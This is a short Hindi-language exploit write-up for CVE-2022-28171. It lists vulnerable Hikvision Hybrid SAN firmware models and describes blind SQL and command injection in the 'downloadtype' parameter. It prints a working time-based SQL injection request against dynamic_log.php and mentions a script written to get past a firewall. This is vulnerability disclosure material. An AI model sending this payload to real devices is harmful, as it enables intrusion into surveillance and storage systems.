
CVE-2022-28171 के लिए पायथन शोषण जो Hikvision Hybrid SAN उपकरणों को लक्षित करता है, ब्लाइंड SQL इंजेक्शन और कमांड इंजेक्शन को स्वचालित करके दूरस्थ कोड निष्पादन प्राप्त करने के लिए।
मैंने मूल रूप से इसे ExploitDB पर प्रकाशित किया था, जिसे आप https://www.exploit-db.com/exploits/51607 पर पा सकते हैं
# Date: 16 July 2023
# Exploit Author: Thurein Soe
# CVE : CVE-2022-28171
# Reference Link: https://cve.report/CVE-2022-28171
# Vulnerable Versions:
Ds-a71024 Firmware
Ds-a71024 Firmware
Ds-a71048r-cvs Firmware
Ds-a71048 Firmware
Ds-a71072r Firmware
Ds-a71072r Firmware
Ds-a72024 Firmware
Ds-a72024 Firmware
Ds-a72048r-cvs Firmware
Ds-a72072r Firmware
Ds-a80316s Firmware
Ds-a80624s Firmware
Ds-a81016s Firmware
Ds-a82024d Firmware
Ds-a71048r-cvs
Ds-a71024
Ds-a71048
Ds-a71072r
Ds-a80624s
Ds-a82024d
Ds-a80316s
Ds-a81016s
Hikvision एक विश्व-अग्रणी निगरानी निर्माता और नागरिक तथा सैन्य उद्देश्यों के लिए वीडियो निगरानी और इंटरनेट ऑफ थिंग्स (IoT) उपकरणों का आपूर्तिकर्ता है। कुछ Hikvision Hybrid SAN उत्पाद कमांड इंजेक्शन, ब्लाइंड SQL इंजेक्शन, HTTP अनुरोध तस्करी, और रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग जैसी कई रिमोट कोड निष्पादन कमजोरियों के लिए संवेदनशील थे। इसके परिणामस्वरूप रिमोट कोड निष्पादन हुआ, जिससे मनमाने ऑपरेटिंग सिस्टम कमांड और अधिक को निष्पादित करना संभव था।
मैन्युअल परीक्षण ने पुष्टि की कि "downloadtype" पैरामीटर ब्लाइंड SQL इंजेक्शन और कमांड इंजेक्शन के लिए संवेदनशील था। मैंने एक Python स्क्रिप्ट बनाई ताकि SQL संस्करणों को स्वचालित और गणना किया जा सके क्योंकि एप्लिकेशन फायरवॉल के पीछे था और SQLmap से सभी अनुरोधों को अवरुद्ध कर रहा था।
Request Body:
GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)' HTTP/1.1
Host: X.X.X.X.12:2004
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close